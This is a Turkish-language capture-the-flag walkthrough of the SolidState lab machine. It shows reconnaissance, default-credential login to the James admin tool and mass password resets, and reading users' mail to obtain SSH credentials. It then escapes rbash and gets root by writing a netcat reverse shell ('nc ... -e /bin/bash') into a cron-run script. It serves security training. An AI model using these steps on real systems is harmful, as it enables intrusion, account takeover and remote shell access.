Makine Hakkında Bilgiler
Açıklama:
It was originally created for HackTheBox
Vulnhub Sayfası:
https://www.vulnhub.com/entry/solidstate-1,261/
İndirme Sayfası:
https://download.vulnhub.com/solidstate/SolidState.zip
Walkthrough
Makineyi tespit ederek başlayalım.
┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f3:da:b0 VMware, Inc.
192.168.6.142 00:0c:29:0c:40:ff VMware, Inc.
192.168.6.254 00:50:56:e2:4d:69 VMware, Inc.
21 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.939 seconds (132.03 hosts/sec). 4 responded
nmap taraması ile devam edelim.
[*] Scan: 182
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 17:13 EDT
Nmap scan report for 192.168.6.142
Host is up (0.0010s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.6.132 [192.168.6.132]), PIPELINING, ENHANCEDSTATUSCODES,
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
MAC Address: 00:0C:29:0C:40:FF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.02 ms 192.168.6.142
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.63 seconds
http haricindeki portlardan bilgi toplamaya çalışalım. nmap çıktılarında sonra bir exploit araması yaptım ve aşağıdaki sonuçları buldum.
┌──(root💀kali)-[~/oscp/solid]
└─# searchsploit JAMES 2.3.2
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~/oscp/solid]
└─# cp $(locate linux/remote/35513.py) .
┌──(root💀kali)-[~/oscp/solid]
└─# ls
35513.py
┌──(root💀kali)-[~/oscp/solid]
└─# cat 35513.py
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
import socket
import sys
import time
# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
...credentials to James Remote Administration Tool (Default - root/root) ifadesini görünce bir denemek istedim ve başarılı oldumn.
┌──(root💀kali)-[~/oscp/solid]
└─# nc 192.168.6.142 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
Unknown command
setpassword james root
Password for james reset
setpassword thomas root
Password for thomas reset
setpassword john root
Password for john reset
setpassword mindy root
Password for mindy reset
setpassword mailadmin root
Password for mailadmin reset
exit
Unknown command exit
^CArtık herkesin maillerine bakabilirim.
┌──(root💀kali)-[~/oscp/solid]
└─# telnet 192.168.6.142 110 1 ⨯
Trying 192.168.6.142...
Connected to 192.168.6.142.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
^C^X
exit
^C^C^C^C
help
^C^X^X^XConnection closed by foreign host.
Bakalım bir parola elde edebilecek miyiz?
┌──(root💀kali)-[~/oscp/solid]
└─# telnet 192.168.6.142 110 1 ⨯
Trying 192.168.6.142...
Connected to 192.168.6.142.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
rety 1
-ERR
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
Harika bunun üzerine ssh ile bağlanmayı dedim ve ilk flagimi aldım ancak rbash ile karşılaştım.
──(root💀kali)-[~/oscp/solid]
└─# ssh [email protected]
The authenticity of host '192.168.6.142 (192.168.6.142)' can't be established.
ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.6.142' (ECDSA) to the list of known hosts.
[email protected]'s password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ pwd
/home/mindy
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ ls
bin user.txt
mindy@solidstate:~$ cat user.txt
914d0a4ebc1777889b5b89a23f556fd75
mindy@solidstate:~$
Aşağıdaki şekilde bunu bypass edebildim.
┌──(root💀kali)-[~/oscp/solid]
└─# ssh [email protected] -t "bash --noprofile" 1 ⨯
[email protected]'s password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ pwd
/home/mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd james
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ alias ls="ls -al"İçeride gezindikten sonra root haklarında ve değiştirebildiğim bir dosya buldum. crotab'a eklenmesi umuduyla dosyayı değiştirdim. Ancak crontab'da olduğuna emindim çünkü daha önceki arama çıktılarımı /tmp klaörünü altına atıyordum. Belli bir süre sonra bunların silindiğini görmüştüm.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ find / -writable -type f -exec ls -al {} \; 2>/dev/null | tee result
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat result | grep root | grep py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ nano /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ nano /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('nc 192.168.6.132 1822 -e /bin/bash')
except:
sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$
Doğrulamasını aşağıdaki gibi yapabiliriz.
# crontab -l
crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
*/3 * * * * python /opt/tmp.py
# whoami
whoami
root
İlk Yorumu Siz Yapın